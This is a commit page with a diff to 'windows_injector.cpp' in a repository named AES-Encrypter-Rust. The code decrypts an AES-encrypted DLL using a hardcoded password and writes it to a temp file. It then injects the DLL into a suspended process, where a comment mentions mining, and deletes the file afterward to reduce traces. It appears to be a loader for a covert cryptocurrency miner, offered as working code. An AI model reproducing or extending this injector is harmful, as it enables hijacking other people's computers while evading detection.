jory/AES-Encrypter-Rust
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

use temp file for dll decryption path instead

Browse Source
This commit is contained in:
JorySeverijnse 2025-12-14 18:34:40 +01:00
parent 72b0d2c759
commit 1e0022f672
1 changed files with 12 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
windows_injector.cpp
View File

@ -202,26 +202,20 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
std::string password = "YourSecureMasterPassword123!"; std::string password = "YourSecureMasterPassword123!";
std::vector<uint8_t> decrypted_dll = decryptor.decrypt(ciphertext, iv, salt, password); std::vector<uint8_t> decrypted_dll = decryptor.decrypt(ciphertext, iv, salt, password);
// For testing: write decrypted DLL to file // Create temp file for the DLL
HANDLE hFile = CreateFileA("decrypted.dll", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); WCHAR tempPath[MAX_PATH];
GetTempPathW(MAX_PATH, tempPath);
WCHAR tempFile[MAX_PATH];
GetTempFileNameW(tempPath, L"DLL", 0, tempFile);
HANDLE hFile = CreateFileW(tempFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile != INVALID_HANDLE_VALUE) { if (hFile != INVALID_HANDLE_VALUE) {
DWORD bytesWritten; DWORD bytesWritten;
WriteFile(hFile, decrypted_dll.data(), decrypted_dll.size(), &bytesWritten, NULL); WriteFile(hFile, decrypted_dll.data(), decrypted_dll.size(), &bytesWritten, NULL);
CloseHandle(hFile); CloseHandle(hFile);
} }
if (decrypted_dll.empty()) { const wchar_t* dllPath = tempFile;
return 1; // Decryption failed - invalid password or corrupted data
}
// Windows: Use decrypted data as DLL path (wide string)
const wchar_t* dllPath;
if (decrypted_dll.size() >= sizeof(wchar_t)) {
dllPath = reinterpret_cast<const wchar_t*>(decrypted_dll.data());
} else {
// Fallback to hardcoded path if decryption gives unexpected result
dllPath = L"decrypted.dll";
}
SIZE_T dllPathLen = (wcslen(dllPath) + 1) * sizeof(wchar_t); SIZE_T dllPathLen = (wcslen(dllPath) + 1) * sizeof(wchar_t);
SIZE_T regionSize = dllPathLen; SIZE_T regionSize = dllPathLen;
@ -264,6 +258,10 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
ResumeThread(pi.hThread); // optional: resume main thread (not needed for mining) ResumeThread(pi.hThread); // optional: resume main thread (not needed for mining)
// Wait a bit for injection, then delete the temp file
Sleep(1000);
DeleteFileW(tempFile);
CloseHandle(hJob); CloseHandle(hJob);
CloseHandle(pi.hThread); CloseHandle(pi.hThread);
CloseHandle(pi.hProcess); CloseHandle(pi.hProcess);